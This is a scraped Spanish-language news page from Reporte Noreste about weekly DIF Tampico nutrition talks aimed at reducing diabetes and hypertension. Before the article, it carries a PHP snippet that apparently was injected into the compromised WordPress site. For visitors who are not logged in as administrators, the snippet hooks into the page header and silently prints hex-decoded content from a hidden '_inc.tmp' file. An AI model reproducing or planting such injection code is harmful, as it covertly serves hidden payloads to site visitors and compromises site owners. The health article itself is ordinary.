if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Acciones contra la diabetes y la hipertensión. – Reporte Noreste
Conéctate con nosotros

El consumo de alimentos chatarra como papas fritas y refrescos altos en azúcares o sodio, son parte de los principales problemas de obesidad e hipertensión que existen a nivel nacional.
Para combatir esta tendencia, cada martes el área de nutrición del sistema DIF Tampico, lleva a diversas colonias pláticas de salud, todas ellas encaminadas al consumo inteligente de alimentos saludables como frutas, verduras, cereales y carnes blancas.
Ana Regina Deschamps, Jefa de Nutrición de la dependencia dio a conocer que la hipertensión arterial, diabetes y otros padecimientos de tipo degenerativo, son el problema número uno de salud pública a nivel nacional, de ahí el interés por cambiar la cultura en la alimentación de cada individuo a fin de contribuir en la reducción de estas enfermedades.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Más en Sur de Tamaulipas